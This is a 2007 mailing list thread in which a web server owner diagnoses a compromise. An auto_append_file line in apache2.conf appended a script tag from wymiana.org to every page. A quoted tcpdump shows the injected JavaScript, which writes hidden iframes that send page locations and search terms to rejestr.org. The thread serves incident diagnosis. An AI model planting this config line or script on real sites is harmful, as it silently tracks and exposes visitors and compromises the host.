Security Basics mailing list archives
Re: been hacked ?
From: "d3l user" <d3luser () gmail com>
Date: Thu, 31 May 2007 19:38:07 +0200
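Hi,

I have found the problem: /etc/apache2/apache2.conf contained this line:

php_value auto_append_file "/usr/local/lib/php/stat.php"

Here it is in context:

# # Filters allow you to process content before it is sent to the client. # # To parse .shtml files for server-side includes (SSI): # (You will also need to add "Includes" to the "Options" directive.) # AddType text/html .shtml AddOutputFilter INCLUDES .shtml AddType application/x-httpd-php .html AddType application/x-httpd-php .htm php_value auto_append_file "/usr/local/lib/php/stat.php"

Then, on opening /usr/local/lib/php/stat.php, I saw the bad string:

<script src="http://wymiana.org/stat/script_vip.php?user=2254"></script>

It looks like an SSI attack, but I still have no idea how it was done.

[Editor's note: auto_append_file is a PHP directive rather than an SSI feature. It appends the named file to every response that PHP handles, and because the AddType lines above hand .html and .htm files to PHP, static pages receive the injected script as well. Whoever added the line needed write access to apache2.conf and to /usr/local/lib/php/, so it is worth checking how that access was gained and what else on the host was modified.]

On 5/30/07, d3l user <d3luser () gmail com> wrote: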
While browsing a web page hosted on my web server, I saw the following line in the Firefox page source: <script src="http://wymiana.org/stat/script_vip.php?user=2254 "></script> I then opened the file index.php on the server with vim, and there is no trace of that line. This also happens with static HTML pages. Any idea what is going on? Below you can find the tcpdump stream. Thanks in advance, delUser

GET /mystat/2.js?host=wymiana.org HTTP/1.1 Host: rejestr.org User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.3) Gecko/20061201 Firefox/2.0.0.3 (Ubuntu-feisty) Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://www.mywebsite.com/ HTTP/1.1 200 OK Date: Tue, 29 May 2007 19:46:27 GMT Server: Apache/1.3.36 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.4.2 mod_ssl/2.8.27 OpenSSL/0.9.7a X-Powered-By: PHP/4.4.2 Connection: close Transfer-Encoding: chunked Content-Type: text/html 53d function stopErrors(){return true;}window.onerror=stopErrors; function getJS(v,r) { q = r.toString (); var p = q.indexOf('?'); if (p > 0) {q = q.substring(p+1);} var vs = q.split("&"); for (var i=0;i<vs.length;i++) { var pr = vs[i].split("="); if (pr[0] == v) {return pr[1];} } } var q=""; var r=""; try { if (top.document.referrer) {r=top.document.referrer;} else if (document.referrer) {r=document.referrer;}; }catch (e) {}; if (r !=="") { if (r.indexOf("google.") !== -1) {q="q";}; if (r.indexOf("msn.com") !== -1) {q="q";}; if (r.indexOf("altavista.") !== -1) {q="q";}; if (r.indexOf("yahoo.") !== -1) {q="p";}; if (r.indexOf("netsprint.") !== -1) {q="q";}; if (r.indexOf("onet.pl") !== -1) {q="qt";}; if (r.indexOf(" wp.pl") !== -1) {q="szukaj";}; if (r.indexOf("interia.pl") !== -1) {q="q";}; if (r.indexOf("szukacz.pl") !== -1) {q="q";}; if (r.indexOf("o2.pl") !== -1) {q="qt";}; } var vars=""; if ((r !=="") && 
(q!=="")) { vars=getJS(q,r); } if (vars=="undefined") {vars="";}; if (vars!=="") {vars=vars +"&src=se";}; if (vars!==""){ document.write("<iframe frameborder=0 style='width:0px; height:0px' src=\"http://rejestr.org/mystat/2.php?id="+self.location+"&topkey="+vars+"\"></iframe>") }else document.write("<iframe frameborder=0 style='width:0px; height:0px' src=http://rejestr.org/mystat/2.php?id="+self.location+"></iframe>") 0